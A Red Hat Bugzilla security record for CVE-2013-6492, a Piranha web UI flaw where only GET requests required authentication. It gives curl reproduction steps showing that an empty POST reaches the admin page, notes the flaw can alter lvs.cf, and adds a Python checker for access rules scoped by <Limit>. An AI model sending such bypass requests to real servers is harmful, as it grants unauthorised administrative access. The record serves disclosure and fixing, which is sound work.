Bug 1043040 (CVE-2013-6492) - CVE-2013-6492 piranha: web UI authentication bypass using POST requests
Summary: CVE-2013-6492 piranha: web UI authentication bypass using POST requests
Keywords:
Status: CLOSED ERRATA
Alias: CVE-2013-6492
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: Unspecified
OS: Unspecified
Priority: high
Severity: high
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard:
Depends On: 1061903 1061904 1061905 1061906
Blocks: 1043709
Reported: 2013-12-13 19:58 UTC by Othman Madjoudj
Modified: 2021-02-17 07:04 UTC (History)

Fixed In Version:
Clone Of:
Environment:
Last Closed: 2014-02-13 19:50:31 UTC
Embargoed:


Attachments
Auth bypass fix (345 bytes, patch)
2013-12-13 19:58 UTC, Othman Madjoudj


Links
System ID Private Priority Status Summary Last Updated
CentOS 6825 0 None None None Never
Red Hat Product Errata RHSA-2014:0174 0 normal SHIPPED_LIVE Important: piranha security update 2014-02-13 23:45:55 UTC
Red Hat Product Errata RHSA-2014:0175 0 normal SHIPPED_LIVE Important: piranha security and bug fix update 2014-02-13 23:45:45 UTC

Description Othman Madjoudj 2013-12-13 19:58:51 UTC
Created attachment 836487
Auth bypass fix

Description of problem:

In the Piranha web UI configuration, only GET requests require authentication (via <Limit GET>...</Limit> in the config file); it's possible to display some pages by sending POST requests.

Version-Release number of selected component (if applicable):
piranha-0.8.6-4.el6.x86_64


Steps to Reproduce:

1. GET requests require authentication as expected:

# curl  -I http://192.168.1.34:3636/secure/control.php
HTTP/1.1 401 Authorization Required
Date: Fri, 13 Dec 2013 20:43:35 GMT
Server: Apache/2.2.15 (CentOS) PHP/5.3.3
WWW-Authenticate: Basic realm="access to the piranha web GUI"
Connection: close
Content-Type: text/html; charset=iso-8859-1

2. The same request but with POST:

# curl -d'' -I http://192.168.1.34:3636/secure/control.php 
<HTML>
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML Strict Level 3//EN">

<HEAD>
<TITLE>Piranha (Control/Monitoring)</TITLE>
<STYLE TYPE="text/css">
[...]
[...]
[...]
</FORM>
</TD></TR></TABLE>
</BODY>


Actual results:
Admin page displayed

Expected results:
Admin page denied

Additional info:
A fix is attached
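
An added example, not part of the original report or the attached patch: a small Python check that flags access-control directives wrapped in a <Limit> block, the configuration pattern the description identifies. The sample config, its paths and the function name are constructed for illustration.

```python
import re

# Constructed sample config for illustration (not the piranha httpd.conf).
SAMPLE_CONF = """\
<Directory "/var/www/example/secure">
    AuthType Basic
    <Limit GET>
        Require valid-user
    </Limit>
</Directory>
<Directory "/var/www/example/all-methods">
    # <Limit GET> inside a comment is ignored
    Require valid-user
</Directory>
<Directory "/var/www/example/except">
    <LimitExcept OPTIONS>
        Require valid-user
    </LimitExcept>
</Directory>
"""

LIMIT_OPEN = re.compile(r"^\s*<Limit\s+([^>]+)>", re.IGNORECASE)
LIMIT_CLOSE = re.compile(r"^\s*</Limit>", re.IGNORECASE)
ACCESS = re.compile(r"^\s*(Require|Allow|Deny|Order)\b", re.IGNORECASE)
COMMON_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "PATCH"}


def find_method_scoped_auth(conf_text):
    """Return (line_no, directive, uncovered_methods) for directives inside <Limit>."""
    findings, limited = [], None
    for line_no, line in enumerate(conf_text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # Apache comments occupy whole lines
        opened = LIMIT_OPEN.match(line)
        if opened:
            limited = {m.upper() for m in opened.group(1).split()}
            if "GET" in limited:
                limited.add("HEAD")  # httpd applies a GET limit to HEAD as well
        elif LIMIT_CLOSE.match(line):
            limited = None
        elif limited is not None and ACCESS.match(line):
            findings.append((line_no, line.strip(), sorted(COMMON_METHODS - limited)))
    return findings


if __name__ == "__main__":
    for line_no, directive, uncovered in find_method_scoped_auth(SAMPLE_CONF):
        print(f"line {line_no}: '{directive}' not enforced for {', '.join(uncovered)}")
```

A finding clears when the Require directive is moved out of the <Limit> wrapper so it applies to every method, or when <LimitExcept> is used to name only the methods that are meant to stay open.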

Comment 1 Vincent Danen 2013-12-17 00:25:28 UTC
This would indeed be a security issue, so I'm going to turn this into an SRT bug and get a CVE assigned.  Thank you for this report.

Comment 2 Vincent Danen 2013-12-17 00:34:41 UTC
This also looks to affect upstream piranha as the httpd.conf in question is included in the source file.

Comment 7 Tomas Hoger 2014-02-05 14:51:38 UTC
Original report in the CentOS bug tracker:

http://bugs.centos.org/view.php?id=6825

Comment 8 Tomas Hoger 2014-02-05 15:44:37 UTC
Bumping priority; this can effectively be used to modify the lvs.cf configuration file.

Comment 12 errata-xmlrpc 2014-02-13 18:48:05 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 6

Via RHSA-2014:0175 https://rhn.redhat.com/errata/RHSA-2014-0175.html

Comment 13 errata-xmlrpc 2014-02-13 18:48:20 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 5

Via RHSA-2014:0174 https://rhn.redhat.com/errata/RHSA-2014-0174.html

